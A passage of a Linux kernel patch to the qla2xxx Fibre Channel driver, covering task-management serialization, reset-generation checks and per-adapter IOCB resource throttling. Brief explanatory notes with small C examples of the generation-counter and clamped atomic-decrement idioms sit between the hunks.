+ 	if (!ea->fcport->login_succ && !IS_SW_RESV_ADDR(ea->fcport->d_id)) {
+@@ -1997,12 +2004,11 @@ qla2x00_tmf_iocb_timeout(void *data)
+ 	int rc, h;
+ 	unsigned long flags;
+ 
+-	if (sp->type == SRB_MARKER) {
+-		complete(&tmf->u.tmf.comp);
+-		return;
+-	}
++	if (sp->type == SRB_MARKER)
++		rc = QLA_FUNCTION_FAILED;
++	else
++		rc = qla24xx_async_abort_cmd(sp, false);
+ 
+-	rc = qla24xx_async_abort_cmd(sp, false);
+ 	if (rc) {
+ 		spin_lock_irqsave(sp->qpair->qp_lock_ptr, flags);
+ 		for (h = 1; h < sp->qpair->req->num_outstanding_cmds; h++) {
+@@ -2033,10 +2039,14 @@ static void qla_marker_sp_done(srb_t *sp, int res)
+ 	complete(&tmf->u.tmf.comp);
+ }
+ 
+-#define  START_SP_W_RETRIES(_sp, _rval) \
++#define  START_SP_W_RETRIES(_sp, _rval, _chip_gen, _login_gen) \
+ {\
+ 	int cnt = 5; \
+ 	do { \
++		if (_chip_gen != sp->vha->hw->chip_reset || _login_gen != sp->fcport->login_gen) {\
++			_rval = EINVAL; \
++			break; \
++		} \
+ 		_rval = qla2x00_start_sp(_sp); \
+ 		if (_rval == EAGAIN) \
+ 			msleep(1); \
+@@ -2059,6 +2069,7 @@ qla26xx_marker(struct tmf_arg *arg)
+ 	srb_t *sp;
+ 	int rval = QLA_FUNCTION_FAILED;
+ 	fc_port_t *fcport = arg->fcport;
++	u32 chip_gen, login_gen;
+ 
+ 	if (TMF_NOT_READY(arg->fcport)) {
+ 		ql_dbg(ql_dbg_taskm, vha, 0x8039,
+@@ -2068,6 +2079,9 @@ qla26xx_marker(struct tmf_arg *arg)
+ 		return QLA_SUSPENDED;
+ 	}
+ 
++	chip_gen = vha->hw->chip_reset;
++	login_gen = fcport->login_gen;
++
+ 	/* ref: INIT */
+ 	sp = qla2xxx_get_qpair_sp(vha, arg->qpair, fcport, GFP_KERNEL);
+ 	if (!sp)
+@@ -2085,7 +2099,7 @@ qla26xx_marker(struct tmf_arg *arg)
+ 	tm_iocb->u.tmf.loop_id = fcport->loop_id;
+ 	tm_iocb->u.tmf.vp_index = vha->vp_idx;
+ 
+-	START_SP_W_RETRIES(sp, rval);
++	START_SP_W_RETRIES(sp, rval, chip_gen, login_gen);
+ 
+ 	ql_dbg(ql_dbg_taskm, vha, 0x8006,
+ 	    "Async-marker hdl=%x loop-id=%x portid=%06x modifier=%x lun=%lld qp=%d rval %d.\n",
+@@ -2124,6 +2138,17 @@ static void qla2x00_tmf_sp_done(srb_t *sp, int res)
+ 	complete(&tmf->u.tmf.comp);
+ }
+ 
++static int qla_tmf_wait(struct tmf_arg *arg)
++{
++	/* Only two types of error handling reach here: LUN or target reset. */
++	if (arg->flags & (TCF_LUN_RESET | TCF_ABORT_TASK_SET | TCF_CLEAR_TASK_SET))
++		return qla2x00_eh_wait_for_pending_commands(arg->vha,
++		    arg->fcport->d_id.b24, arg->lun, WAIT_LUN);
++	else
++		return qla2x00_eh_wait_for_pending_commands(arg->vha,
++		    arg->fcport->d_id.b24, arg->lun, WAIT_TARGET);
++}
++
+ static int
+ __qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ {
+@@ -2131,8 +2156,9 @@ __qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ 	struct srb_iocb *tm_iocb;
+ 	srb_t *sp;
+ 	int rval = QLA_FUNCTION_FAILED;
+-
+ 	fc_port_t *fcport = arg->fcport;
++	u32 chip_gen, login_gen;
++	u64 jif;
+ 
+ 	if (TMF_NOT_READY(arg->fcport)) {
+ 		ql_dbg(ql_dbg_taskm, vha, 0x8032,
+@@ -2142,6 +2168,9 @@ __qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ 		return QLA_SUSPENDED;
+ 	}
+ 
++	chip_gen = vha->hw->chip_reset;
++	login_gen = fcport->login_gen;
++
+ 	/* ref: INIT */
+ 	sp = qla2xxx_get_qpair_sp(vha, arg->qpair, fcport, GFP_KERNEL);
+ 	if (!sp)
+@@ -2159,7 +2188,7 @@ __qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ 	tm_iocb->u.tmf.flags = arg->flags;
+ 	tm_iocb->u.tmf.lun = arg->lun;
+ 
+-	START_SP_W_RETRIES(sp, rval);
++	START_SP_W_RETRIES(sp, rval, chip_gen, login_gen);
+ 
+ 	ql_dbg(ql_dbg_taskm, vha, 0x802f,
+ 	    "Async-tmf hdl=%x loop-id=%x portid=%06x ctrl=%x lun=%lld qp=%d rval=%x.\n",
+@@ -2177,8 +2206,26 @@ __qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ 		    "TM IOCB failed (%x).\n", rval);
+ 	}
+ 
+-	if (!test_bit(UNLOADING, &vha->dpc_flags) && !IS_QLAFX00(vha->hw))
+-		rval = qla26xx_marker(arg);
++	if (!test_bit(UNLOADING, &vha->dpc_flags) && !IS_QLAFX00(vha->hw)) {
++		jif = jiffies;
++		if (qla_tmf_wait(arg)) {
++			ql_log(ql_log_info, vha, 0x803e,
++			       "Waited %u ms Nexus=%ld:%06x:%llu.\n",
++			       jiffies_to_msecs(jiffies - jif), vha->host_no,
++			       fcport->d_id.b24, arg->lun);
++		}
++
++		if (chip_gen == vha->hw->chip_reset && login_gen == fcport->login_gen) {
++			rval = qla26xx_marker(arg);
++		} else {
++			ql_log(ql_log_info, vha, 0x803e,
++			       "Skip Marker due to disruption. Nexus=%ld:%06x:%llu.\n",
++			       vha->host_no, fcport->d_id.b24, arg->lun);
++			rval = QLA_FUNCTION_FAILED;
++		}
++	}
++	if (tm_iocb->u.tmf.data)
++		rval = tm_iocb->u.tmf.data;
+ 
+ done_free_sp:
+ 	/* ref: INIT */
+@@ -2187,30 +2234,42 @@ done:
+ 	return rval;
+ }
+ 
+-static void qla_put_tmf(fc_port_t *fcport)
++static void qla_put_tmf(struct tmf_arg *arg)
+ {
+-	struct scsi_qla_host *vha = fcport->vha;
++	struct scsi_qla_host *vha = arg->vha;
+ 	struct qla_hw_data *ha = vha->hw;
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&ha->tgt.sess_lock, flags);
+-	fcport->active_tmf--;
++	ha->active_tmf--;
++	list_del(&arg->tmf_elem);
+ 	spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
+ }
+ 
+ static
+-int qla_get_tmf(fc_port_t *fcport)
++int qla_get_tmf(struct tmf_arg *arg)
+ {
+-	struct scsi_qla_host *vha = fcport->vha;
++	struct scsi_qla_host *vha = arg->vha;
+ 	struct qla_hw_data *ha = vha->hw;
+ 	unsigned long flags;
++	fc_port_t *fcport = arg->fcport;
+ 	int rc = 0;
+-	LIST_HEAD(tmf_elem);
++	struct tmf_arg *t;
+ 
+ 	spin_lock_irqsave(&ha->tgt.sess_lock, flags);
+-	list_add_tail(&tmf_elem, &fcport->tmf_pending);
++	list_for_each_entry(t, &ha->tmf_active, tmf_elem) {
++		if (t->fcport == arg->fcport && t->lun == arg->lun) {
++			/* reject duplicate TMF */
++			ql_log(ql_log_warn, vha, 0x802c,
++			       "found duplicate TMF.  Nexus=%ld:%06x:%llu.\n",
++			       vha->host_no, fcport->d_id.b24, arg->lun);
++			spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
++			return -EINVAL;
++		}
++	}
+ 
+-	while (fcport->active_tmf >= MAX_ACTIVE_TMF) {
++	list_add_tail(&arg->tmf_elem, &ha->tmf_pending);
++	while (ha->active_tmf >= MAX_ACTIVE_TMF) {
+ 		spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
+ 
+ 		msleep(1);
+@@ -2222,15 +2281,17 @@ int qla_get_tmf(fc_port_t *fcport)
+ 			rc = EIO;
+ 			break;
+ 		}
+-		if (fcport->active_tmf < MAX_ACTIVE_TMF &&
+-		    list_is_first(&tmf_elem, &fcport->tmf_pending))
++		if (ha->active_tmf < MAX_ACTIVE_TMF &&
++		    list_is_first(&arg->tmf_elem, &ha->tmf_pending))
+ 			break;
+ 	}
+ 
+-	list_del(&tmf_elem);
++	list_del(&arg->tmf_elem);
+ 
+-	if (!rc)
+-		fcport->active_tmf++;
++	if (!rc) {
++		ha->active_tmf++;
++		list_add_tail(&arg->tmf_elem, &ha->tmf_active);
++	}
+ 
+ 	spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
+ 
+@@ -2242,9 +2303,8 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint64_t lun,
+ 		     uint32_t tag)
+ {
+ 	struct scsi_qla_host *vha = fcport->vha;
+-	struct qla_qpair *qpair;
+ 	struct tmf_arg a;
+-	int i, rval = QLA_SUCCESS;
++	int rval = QLA_SUCCESS;
+ 
+ 	if (TMF_NOT_READY(fcport))
+ 		return QLA_SUSPENDED;
+@@ -2252,47 +2312,22 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint64_t lun,
+ 	a.vha = fcport->vha;
+ 	a.fcport = fcport;
+ 	a.lun = lun;
++	a.flags = flags;
++	INIT_LIST_HEAD(&a.tmf_elem);
++
+ 	if (flags & (TCF_LUN_RESET|TCF_ABORT_TASK_SET|TCF_CLEAR_TASK_SET|TCF_CLEAR_ACA)) {
+ 		a.modifier = MK_SYNC_ID_LUN;
+-
+-		if (qla_get_tmf(fcport))
+-			return QLA_FUNCTION_FAILED;
+ 	} else {
+ 		a.modifier = MK_SYNC_ID;
+ 	}
+ 
+-	if (vha->hw->mqenable) {
+-		for (i = 0; i < vha->hw->num_qpairs; i++) {
+-			qpair = vha->hw->queue_pair_map[i];
+-			if (!qpair)
+-				continue;
+-
+-			if (TMF_NOT_READY(fcport)) {
+-				ql_log(ql_log_warn, vha, 0x8026,
+-				    "Unable to send TM due to disruption.\n");
+-				rval = QLA_SUSPENDED;
+-				break;
+-			}
+-
+-			a.qpair = qpair;
+-			a.flags = flags|TCF_NOTMCMD_TO_TARGET;
+-			rval = __qla2x00_async_tm_cmd(&a);
+-			if (rval)
+-				break;
+-		}
+-	}
+-
+-	if (rval)
+-		goto bailout;
++	if (qla_get_tmf(&a))
++		return QLA_FUNCTION_FAILED;
+ 
+ 	a.qpair = vha->hw->base_qpair;
+-	a.flags = flags;
+ 	rval = __qla2x00_async_tm_cmd(&a);
+ 
+-bailout:
+-	if (a.modifier == MK_SYNC_ID_LUN)
+-		qla_put_tmf(fcport);
+-
++	qla_put_tmf(&a);
+ 	return rval;
+ }
+ 
+@@ -4148,39 +4183,61 @@ out:
+ 	return ha->flags.lr_detected;
+ }
+ 
+-void qla_init_iocb_limit(scsi_qla_host_t *vha)
++static void __qla_adjust_iocb_limit(struct qla_qpair *qpair)
+ {
+-	u16 i, num_qps;
+-	u32 limit;
+-	struct qla_hw_data *ha = vha->hw;
++	u8 num_qps;
++	u16 limit;
++	struct qla_hw_data *ha = qpair->vha->hw;
+ 
+ 	num_qps = ha->num_qpairs + 1;
+ 	limit = (ha->orig_fw_iocb_count * QLA_IOCB_PCT_LIMIT) / 100;
+ 
+-	ha->base_qpair->fwres.iocbs_total = ha->orig_fw_iocb_count;
+-	ha->base_qpair->fwres.iocbs_limit = limit;
+-	ha->base_qpair->fwres.iocbs_qp_limit = limit / num_qps;
+-	ha->base_qpair->fwres.iocbs_used = 0;
++	qpair->fwres.iocbs_total = ha->orig_fw_iocb_count;
++	qpair->fwres.iocbs_limit = limit;
++	qpair->fwres.iocbs_qp_limit = limit / num_qps;
++
++	qpair->fwres.exch_total = ha->orig_fw_xcb_count;
++	qpair->fwres.exch_limit = (ha->orig_fw_xcb_count *
++				   QLA_IOCB_PCT_LIMIT) / 100;
++}
++
++void qla_init_iocb_limit(scsi_qla_host_t *vha)
++{
++	u8 i;
++	struct qla_hw_data *ha = vha->hw;
+ 
+-	ha->base_qpair->fwres.exch_total = ha->orig_fw_xcb_count;
+-	ha->base_qpair->fwres.exch_limit = (ha->orig_fw_xcb_count *
+-					    QLA_IOCB_PCT_LIMIT) / 100;
++	__qla_adjust_iocb_limit(ha->base_qpair);
++	ha->base_qpair->fwres.iocbs_used = 0;
+ 	ha->base_qpair->fwres.exch_used  = 0;
+ 
+ 	for (i = 0; i < ha->max_qpairs; i++) {
+ 		if (ha->queue_pair_map[i])  {
+-			ha->queue_pair_map[i]->fwres.iocbs_total =
+-				ha->orig_fw_iocb_count;
+-			ha->queue_pair_map[i]->fwres.iocbs_limit = limit;
+-			ha->queue_pair_map[i]->fwres.iocbs_qp_limit =
+-				limit / num_qps;
++			__qla_adjust_iocb_limit(ha->queue_pair_map[i]);
+ 			ha->queue_pair_map[i]->fwres.iocbs_used = 0;
+-			ha->queue_pair_map[i]->fwres.exch_total = ha->orig_fw_xcb_count;
+-			ha->queue_pair_map[i]->fwres.exch_limit =
+-				(ha->orig_fw_xcb_count * QLA_IOCB_PCT_LIMIT) / 100;
+ 			ha->queue_pair_map[i]->fwres.exch_used = 0;
+ 		}
+ 	}
++
++	ha->fwres.iocb_total = ha->orig_fw_iocb_count;
++	ha->fwres.iocb_limit = (ha->orig_fw_iocb_count * QLA_IOCB_PCT_LIMIT) / 100;
++	ha->fwres.exch_total = ha->orig_fw_xcb_count;
++	ha->fwres.exch_limit = (ha->orig_fw_xcb_count * QLA_IOCB_PCT_LIMIT) / 100;
++
++	atomic_set(&ha->fwres.iocb_used, 0);
++	atomic_set(&ha->fwres.exch_used, 0);
++}
++
++void qla_adjust_iocb_limit(scsi_qla_host_t *vha)
++{
++	u8 i;
++	struct qla_hw_data *ha = vha->hw;
++
++	__qla_adjust_iocb_limit(ha->base_qpair);
++
++	for (i = 0; i < ha->max_qpairs; i++) {
++		if (ha->queue_pair_map[i])
++			__qla_adjust_iocb_limit(ha->queue_pair_map[i]);
++	}
+ }
+ 
+ /**
+@@ -4778,15 +4835,16 @@ qla2x00_init_rings(scsi_qla_host_t *vha)
+ 	if (ha->flags.edif_enabled)
+ 		mid_init_cb->init_cb.frame_payload_size = cpu_to_le16(ELS_MAX_PAYLOAD);
+ 
++	QLA_FW_STARTED(ha);
+ 	rval = qla2x00_init_firmware(vha, ha->init_cb_size);
+ next_check:
+ 	if (rval) {
++		QLA_FW_STOPPED(ha);
+ 		ql_log(ql_log_fatal, vha, 0x00d2,
+ 		    "Init Firmware **** FAILED ****.\n");
+ 	} else {
+ 		ql_dbg(ql_dbg_init, vha, 0x00d3,
+ 		    "Init Firmware -- success.\n");
+-		QLA_FW_STARTED(ha);
+ 		vha->u_ql2xexchoffld = vha->u_ql2xiniexchg = 0;
+ 	}
+ 
+@@ -5528,7 +5586,6 @@ qla2x00_alloc_fcport(scsi_qla_host_t *vha, gfp_t flags)
+ 	INIT_WORK(&fcport->reg_work, qla_register_fcport_fn);
+ 	INIT_LIST_HEAD(&fcport->gnl_entry);
+ 	INIT_LIST_HEAD(&fcport->list);
+-	INIT_LIST_HEAD(&fcport->tmf_pending);
+ 
+ 	INIT_LIST_HEAD(&fcport->sess_cmd_list);
+ 	spin_lock_init(&fcport->sess_cmd_lock);
+@@ -6116,6 +6173,8 @@ qla2x00_reg_remote_port(scsi_qla_host_t *vha, fc_port_t *fcport)
+ void
+ qla2x00_update_fcport(scsi_qla_host_t *vha, fc_port_t *fcport)
+ {
++	unsigned long flags;
++
+ 	if (IS_SW_RESV_ADDR(fcport->d_id))
+ 		return;
+ 
+@@ -6125,7 +6184,11 @@ qla2x00_update_fcport(scsi_qla_host_t *vha, fc_port_t *fcport)
+ 	qla2x00_set_fcport_disc_state(fcport, DSC_UPD_FCPORT);
+ 	fcport->login_retry = vha->hw->login_retry_count;
+ 	fcport->flags &= ~(FCF_LOGIN_NEEDED | FCF_ASYNC_SENT);
++
++	spin_lock_irqsave(&vha->work_lock, flags);
+ 	fcport->deleted = 0;
++	spin_unlock_irqrestore(&vha->work_lock, flags);
++
+ 	if (vha->hw->current_topology == ISP_CFG_NL)
+ 		fcport->logout_on_delete = 0;
+ 	else
+@@ -7391,14 +7454,15 @@ qla2x00_abort_isp_cleanup(scsi_qla_host_t *vha)
+ 	}
+ 
+ 	/* purge MBox commands */
+-	if (atomic_read(&ha->num_pend_mbx_stage3)) {
++	spin_lock_irqsave(&ha->hardware_lock, flags);
++	if (test_bit(MBX_INTR_WAIT, &ha->mbx_cmd_flags)) {
+ 		clear_bit(MBX_INTR_WAIT, &ha->mbx_cmd_flags);
+ 		complete(&ha->mbx_intr_comp);
+ 	}
++	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 	i = 0;
+-	while (atomic_read(&ha->num_pend_mbx_stage3) ||
+-	    atomic_read(&ha->num_pend_mbx_stage2) ||
++	while (atomic_read(&ha->num_pend_mbx_stage2) ||
+ 	    atomic_read(&ha->num_pend_mbx_stage1)) {
+ 		msleep(20);
+ 		i++;
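
Several qla2xxx hunks above snapshot chip_reset and login_gen before issuing a TMF and compare them again afterwards (and inside START_SP_W_RETRIES), so a chip reset or relogin that happens mid-operation is detected and the follow-up marker is skipped. A generic sketch of this generation-counter idiom, with hypothetical names:

#include <stdbool.h>
#include <stdio.h>

struct hw {
	unsigned int chip_gen;	/* bumped on every chip reset */
	unsigned int login_gen;	/* bumped on every (re)login */
};

/* Simulated slow operation; a reset may occur while it runs. */
static void issue_tmf(struct hw *hw, bool disrupt)
{
	if (disrupt)
		hw->chip_gen++;	/* chip reset happened mid-flight */
}

static int tmf_with_marker(struct hw *hw, bool disrupt)
{
	unsigned int chip_gen = hw->chip_gen;	/* snapshot up front */
	unsigned int login_gen = hw->login_gen;

	issue_tmf(hw, disrupt);

	if (chip_gen != hw->chip_gen || login_gen != hw->login_gen) {
		printf("skip marker: disruption detected\n");
		return -1;
	}
	printf("send marker\n");
	return 0;
}

int main(void)
{
	struct hw hw = { 0, 0 };

	tmf_with_marker(&hw, false);	/* sends the marker */
	tmf_with_marker(&hw, true);	/* detects the reset, skips it */
	return 0;
}
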
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index a034699e58ae9..a7b5d11146827 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -386,6 +386,7 @@ enum {
+ 	RESOURCE_IOCB = BIT_0,
+ 	RESOURCE_EXCH = BIT_1,  /* exchange */
+ 	RESOURCE_FORCE = BIT_2,
++	RESOURCE_HA = BIT_3,
+ };
+ 
+ static inline int
+@@ -393,7 +394,7 @@ qla_get_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
+ 	u16 iocbs_used, i;
+ 	u16 exch_used;
+-	struct qla_hw_data *ha = qp->vha->hw;
++	struct qla_hw_data *ha = qp->hw;
+ 
+ 	if (!ql2xenforce_iocb_limit) {
+ 		iores->res_type = RESOURCE_NONE;
+@@ -428,15 +429,69 @@ qla_get_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ 			return -ENOSPC;
+ 		}
+ 	}
++
++	if (ql2xenforce_iocb_limit == 2) {
++		if ((iores->iocb_cnt + atomic_read(&ha->fwres.iocb_used)) >=
++		    ha->fwres.iocb_limit) {
++			iores->res_type = RESOURCE_NONE;
++			return -ENOSPC;
++		}
++
++		if (iores->res_type & RESOURCE_EXCH) {
++			if ((iores->exch_cnt + atomic_read(&ha->fwres.exch_used)) >=
++			    ha->fwres.exch_limit) {
++				iores->res_type = RESOURCE_NONE;
++				return -ENOSPC;
++			}
++		}
++	}
++
+ force:
+ 	qp->fwres.iocbs_used += iores->iocb_cnt;
+ 	qp->fwres.exch_used += iores->exch_cnt;
++	if (ql2xenforce_iocb_limit == 2) {
++		atomic_add(iores->iocb_cnt, &ha->fwres.iocb_used);
++		atomic_add(iores->exch_cnt, &ha->fwres.exch_used);
++		iores->res_type |= RESOURCE_HA;
++	}
+ 	return 0;
+ }
+ 
++/*
++ * Decrement to zero.  This routine will not decrement below zero.
++ * @v:  pointer of type atomic_t
++ * @amount: amount to decrement from v
++ */
++static void qla_atomic_dtz(atomic_t *v, int amount)
++{
++	int c, old, dec;
++
++	c = atomic_read(v);
++	for (;;) {
++		dec = c - amount;
++		if (unlikely(dec < 0))
++			dec = 0;
++
++		old = atomic_cmpxchg((v), c, dec);
++		if (likely(old == c))
++			break;
++		c = old;
++	}
++}
++
+ static inline void
+ qla_put_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
++	struct qla_hw_data *ha = qp->hw;
++
++	if (iores->res_type & RESOURCE_HA) {
++		if (iores->res_type & RESOURCE_IOCB)
++			qla_atomic_dtz(&ha->fwres.iocb_used, iores->iocb_cnt);
++
++		if (iores->res_type & RESOURCE_EXCH)
++			qla_atomic_dtz(&ha->fwres.exch_used, iores->exch_cnt);
++	}
++
+ 	if (iores->res_type & RESOURCE_IOCB) {
+ 		if (qp->fwres.iocbs_used >= iores->iocb_cnt) {
+ 			qp->fwres.iocbs_used -= iores->iocb_cnt;
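
qla_atomic_dtz() above implements a decrement that clamps at zero via a compare-and-swap loop: read the counter, compute the clamped result, and retry if another CPU changed the value in between. The same idiom in portable C11 atomics:

#include <stdatomic.h>
#include <stdio.h>

/* Decrement *v by amount, but never below zero (lock-free CAS loop). */
static void atomic_dec_to_zero(atomic_int *v, int amount)
{
	int c = atomic_load(v);

	for (;;) {
		int dec = c - amount;

		if (dec < 0)
			dec = 0;
		/* On failure, c is reloaded with the current value. */
		if (atomic_compare_exchange_weak(v, &c, dec))
			break;
	}
}

int main(void)
{
	atomic_int used = 3;

	atomic_dec_to_zero(&used, 5);	/* clamps at 0, not -2 */
	printf("used = %d\n", atomic_load(&used));
	return 0;
}
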
+diff --git a/drivers/scsi/qla2xxx/qla_iocb.c b/drivers/scsi/qla2xxx/qla_iocb.c
+index c9a686f06d29d..9e524d52dc862 100644
+--- a/drivers/scsi/qla2xxx/qla_iocb.c
++++ b/drivers/scsi/qla2xxx/qla_iocb.c
+@@ -3887,6 +3887,7 @@ qla_marker_iocb(srb_t *sp, struct mrk_entry_24xx *mrk)
+ {
+ 	mrk->entry_type = MARKER_TYPE;
+ 	mrk->modifier = sp->u.iocb_cmd.u.tmf.modifier;
++	mrk->handle = make_handle(sp->qpair->req->id, sp->handle);
+ 	if (sp->u.iocb_cmd.u.tmf.modifier != MK_SYNC_ALL) {
+ 		mrk->nport_handle = cpu_to_le16(sp->u.iocb_cmd.u.tmf.loop_id);
+ 		int_to_scsilun(sp->u.iocb_cmd.u.tmf.lun, (struct scsi_lun *)&mrk->lun);
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index b41d604ca9bc8..0111249cc8774 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -1121,8 +1121,12 @@ qla2x00_async_event(scsi_qla_host_t *vha, struct rsp_que *rsp, uint16_t *mb)
+ 	unsigned long	flags;
+ 	fc_port_t	*fcport = NULL;
+ 
+-	if (!vha->hw->flags.fw_started)
++	if (!vha->hw->flags.fw_started) {
++		ql_log(ql_log_warn, vha, 0x50ff,
++		    "Dropping AEN - %04x %04x %04x %04x.\n",
++		    mb[0], mb[1], mb[2], mb[3]);
+ 		return;
++	}
+ 
+ 	/* Setup to process RIO completion. */
+ 	handle_cnt = 0;
+@@ -2539,7 +2543,6 @@ qla24xx_tm_iocb_entry(scsi_qla_host_t *vha, struct req_que *req, void *tsk)
+ 	case CS_PORT_BUSY:
+ 	case CS_INCOMPLETE:
+ 	case CS_PORT_UNAVAILABLE:
+-	case CS_TIMEOUT:
+ 	case CS_RESET:
+ 		if (atomic_read(&fcport->state) == FCS_ONLINE) {
+ 			ql_dbg(ql_dbg_disc, fcport->vha, 0x3021,
+diff --git a/drivers/scsi/qla2xxx/qla_mbx.c b/drivers/scsi/qla2xxx/qla_mbx.c
+index 359595a64664c..f794f4363a38c 100644
+--- a/drivers/scsi/qla2xxx/qla_mbx.c
++++ b/drivers/scsi/qla2xxx/qla_mbx.c
+@@ -273,7 +273,6 @@ qla2x00_mailbox_command(scsi_qla_host_t *vha, mbx_cmd_t *mcp)
+ 		spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 		wait_time = jiffies;
+-		atomic_inc(&ha->num_pend_mbx_stage3);
+ 		if (!wait_for_completion_timeout(&ha->mbx_intr_comp,
+ 		    mcp->tov * HZ)) {
+ 			ql_dbg(ql_dbg_mbx, vha, 0x117a,
+@@ -290,7 +289,6 @@ qla2x00_mailbox_command(scsi_qla_host_t *vha, mbx_cmd_t *mcp)
+ 				spin_unlock_irqrestore(&ha->hardware_lock,
+ 				    flags);
+ 				atomic_dec(&ha->num_pend_mbx_stage2);
+-				atomic_dec(&ha->num_pend_mbx_stage3);
+ 				rval = QLA_ABORTED;
+ 				goto premature_exit;
+ 			}
+@@ -302,11 +300,9 @@ qla2x00_mailbox_command(scsi_qla_host_t *vha, mbx_cmd_t *mcp)
+ 			ha->flags.mbox_busy = 0;
+ 			spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 			atomic_dec(&ha->num_pend_mbx_stage2);
+-			atomic_dec(&ha->num_pend_mbx_stage3);
+ 			rval = QLA_ABORTED;
+ 			goto premature_exit;
+ 		}
+-		atomic_dec(&ha->num_pend_mbx_stage3);
+ 
+ 		if (time_after(jiffies, wait_time + 5 * HZ))
+ 			ql_log(ql_log_warn, vha, 0x1015, "cmd=0x%x, waited %d msecs\n",
+@@ -2213,6 +2209,9 @@ qla2x00_get_firmware_state(scsi_qla_host_t *vha, uint16_t *states)
+ 	ql_dbg(ql_dbg_mbx + ql_dbg_verbose, vha, 0x1054,
+ 	    "Entered %s.\n", __func__);
+ 
++	if (!ha->flags.fw_started)
++		return QLA_FUNCTION_FAILED;
++
+ 	mcp->mb[0] = MBC_GET_FIRMWARE_STATE;
+ 	mcp->out_mb = MBX_0;
+ 	if (IS_FWI2_CAPABLE(vha->hw))
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index 57545d5e82b9d..c9a6fc882a801 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -132,6 +132,7 @@ static int qla_nvme_alloc_queue(struct nvme_fc_local_port *lport,
+ 			       "Failed to allocate qpair\n");
+ 			return -EINVAL;
+ 		}
++		qla_adjust_iocb_limit(vha);
+ 	}
+ 	*handle = qpair;
+ 
+@@ -663,7 +664,7 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 
+ 	rval = qla2x00_start_nvme_mq(sp);
+ 	if (rval != QLA_SUCCESS) {
+-		ql_log(ql_log_warn, vha, 0x212d,
++		ql_dbg(ql_dbg_io + ql_dbg_verbose, vha, 0x212d,
+ 		    "qla2x00_start_nvme_mq failed = %d\n", rval);
+ 		sp->priv = NULL;
+ 		priv->sp = NULL;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index ed70eb8847864..78f7cd16967fa 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -44,10 +44,11 @@ module_param(ql2xfulldump_on_mpifail, int, S_IRUGO | S_IWUSR);
+ MODULE_PARM_DESC(ql2xfulldump_on_mpifail,
+ 		 "Set this to take full dump on MPI hang.");
+ 
+-int ql2xenforce_iocb_limit = 1;
++int ql2xenforce_iocb_limit = 2;
+ module_param(ql2xenforce_iocb_limit, int, S_IRUGO | S_IWUSR);
+ MODULE_PARM_DESC(ql2xenforce_iocb_limit,
+-		 "Enforce IOCB throttling, to avoid FW congestion. (default: 1)");
++		 "Enforce IOCB throttling, to avoid FW congestion. (default: 2) "
++		 "1: track usage per queue, 2: track usage per adapter");
+ 
+ /*
+  * CT6 CTX allocation cache
+@@ -1478,8 +1479,9 @@ qla2xxx_eh_device_reset(struct scsi_cmnd *cmd)
+ 		goto eh_reset_failed;
+ 	}
+ 	err = 3;
+-	if (qla2x00_eh_wait_for_pending_commands(vha, sdev->id,
+-	    sdev->lun, WAIT_LUN) != QLA_SUCCESS) {
++	if (qla2x00_eh_wait_for_pending_commands(vha, fcport->d_id.b24,
++						 cmd->device->lun,
++						 WAIT_LUN) != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x800d,
+ 		    "wait for pending cmds failed for cmd=%p.\n", cmd);
+ 		goto eh_reset_failed;
+@@ -1545,8 +1547,8 @@ qla2xxx_eh_target_reset(struct scsi_cmnd *cmd)
+ 		goto eh_reset_failed;
+ 	}
+ 	err = 3;
+-	if (qla2x00_eh_wait_for_pending_commands(vha, sdev->id,
+-	    0, WAIT_TARGET) != QLA_SUCCESS) {
++	if (qla2x00_eh_wait_for_pending_commands(vha, fcport->d_id.b24, 0,
++						 WAIT_TARGET) != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x800d,
+ 		    "wait for pending cmds failed for cmd=%p.\n", cmd);
+ 		goto eh_reset_failed;
+@@ -2999,9 +3001,10 @@ qla2x00_probe_one(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	ha->max_exchg = FW_MAX_EXCHANGES_CNT;
+ 	atomic_set(&ha->num_pend_mbx_stage1, 0);
+ 	atomic_set(&ha->num_pend_mbx_stage2, 0);
+-	atomic_set(&ha->num_pend_mbx_stage3, 0);
+ 	atomic_set(&ha->zio_threshold, DEFAULT_ZIO_THRESHOLD);
+ 	ha->last_zio_threshold = DEFAULT_ZIO_THRESHOLD;
++	INIT_LIST_HEAD(&ha->tmf_pending);
++	INIT_LIST_HEAD(&ha->tmf_active);
+ 
+ 	/* Assign ISP specific operations. */
+ 	if (IS_QLA2100(ha)) {
